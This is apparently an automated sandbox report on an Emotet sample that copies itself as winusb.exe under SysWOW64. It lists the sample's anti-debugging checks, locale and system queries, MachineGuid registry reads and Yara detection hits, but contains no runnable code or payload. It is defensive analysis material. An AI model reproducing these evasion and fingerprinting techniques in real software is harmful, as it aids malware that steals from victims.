Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00427CBF SetUnhandledExceptionFilter, 0_2_00427CBF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00420FD7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00420FD7
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041D41B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041D41B
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00423ABF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00423ABF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00427CBF SetUnhandledExceptionFilter, 0_2_00427CBF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00420FD7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00420FD7
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041D41B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0041D41B
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_00423ABF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00423ABF
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_00427CBF SetUnhandledExceptionFilter, 1_2_00427CBF
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_00420FD7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00420FD7
Source: winusb.exe, 00000001.00000002.914708942.0000000000D50000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: winusb.exe, 00000001.00000002.914708942.0000000000D50000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: winusb.exe, 00000001.00000002.914708942.0000000000D50000.00000002.00000001.sdmp Binary or memory string: Progman
Source: winusb.exe, 00000001.00000002.914708942.0000000000D50000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: winusb.exe, 00000001.00000002.914708942.0000000000D50000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: winusb.exe, 00000001.00000002.914708942.0000000000D50000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: winusb.exe, 00000001.00000002.914708942.0000000000D50000.00000002.00000001.sdmp Binary or memory string: Progman
Source: winusb.exe, 00000001.00000002.914708942.0000000000D50000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_0042B03C
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 0_2_0042B0DF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_0042B0A3
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 0_2_0042A218
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 0_2_004293CB
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA, 0_2_0040E399
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 0_2_0042A470
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA, 0_2_0042941F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_0042955E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 0_2_0042A736
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoA, 0_2_0042CAD3
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 0_2_00423BF7
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 0_2_0042AB86
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_00429BAA
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 0_2_0042AC9D
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 0_2_0042AD35
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 0_2_0042ADA9
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 0_2_0042CE30
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 0_2_0042AF7B
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_0042B03C
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 0_2_0042B0DF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_0042B0A3
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 0_2_0042A218
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 0_2_004293CB
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA, 0_2_0040E399
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 0_2_0042A470
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA, 0_2_0042941F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_0042955E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 0_2_0042A736
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoA, 0_2_0042CAD3
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 0_2_00423BF7
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 0_2_0042AB86
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_00429BAA
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 0_2_0042AC9D
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 0_2_0042AD35
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 0_2_0042ADA9
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 0_2_0042CE30
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 0_2_0042AF7B
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0042B03C
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 1_2_0042B0DF
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0042B0A3
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 1_2_0042A218
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 1_2_004293CB
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA, 1_2_0040E399
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 1_2_0042A470
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA, 1_2_0042941F
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_0042955E
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 1_2_0042A736
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: GetLocaleInfoA, 1_2_0042CAD3
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 1_2_00423BF7
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 1_2_0042AB86
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_00429BAA
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 1_2_0042AC9D
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 1_2_0042AD35
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 1_2_0042ADA9
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 1_2_0042CE30
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 1_2_0042AF7B
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00428596 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00428596
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00428596 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00428596
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00410DC4 _memset,GetVersionExA, 0_2_00410DC4
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00410DC4 _memset,GetVersionExA, 0_2_00410DC4
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000000.00000002.648301312.0000000002180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.914566076.0000000000650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.648328999.00000000021A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.914790785.00000000021E4000.00000004.00000001.sdmp, type: MEMORY